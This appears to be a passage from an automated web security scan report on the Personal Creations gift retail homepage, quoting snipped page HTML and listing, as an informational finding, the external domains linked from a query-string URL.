           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Baby-Name-Frame-30015464?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=3&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Baby Name Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
olstered-Rocker-with-Ottoman-30017015?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=4&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Upholstered Rocker with Ottoman" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
om/gifts/Baby-Alphabet-Quilt-30016554?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Baby Alphabet Quilt" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Heart-in-Sand-Framed-Print-30021311?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=1&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Tub-with-Stand-30021145?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=2&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Galvanized Beverage Tub with Stand" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
strial-Alphabet-Framed-Print-30019088?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=3&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Architectural Alphabet Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
-Wedding--Anniversary-Afghan-30020974?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=4&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Heartwarming Wedding & Anniversary Afghan" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ed-Photography-Framed-Prints-30019837?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_2.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value='';" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.28. http://www.personalcreations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media

The response contains the following links to other domains:

http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_FreePersTest_186x47_HeaderMsg.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_RightTopHeroPod_Birthday.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-0_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-3_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_2.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_4.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_5.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_6.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_8.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_9.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-5_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm
http://link.mercent.com/image.ashx?merchantID=ProFlowers
http://twitter.com/pcgifts
http://www.berries.com/
http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.facebook.com/personalcreations
http://www.linkedin.com/company/personal-creations
http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.providecommerce.com/Careers_Overview.aspx
http://www.providecommerce.com/privacy.aspx
http://www.providecommerce.com/terms.aspx
http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
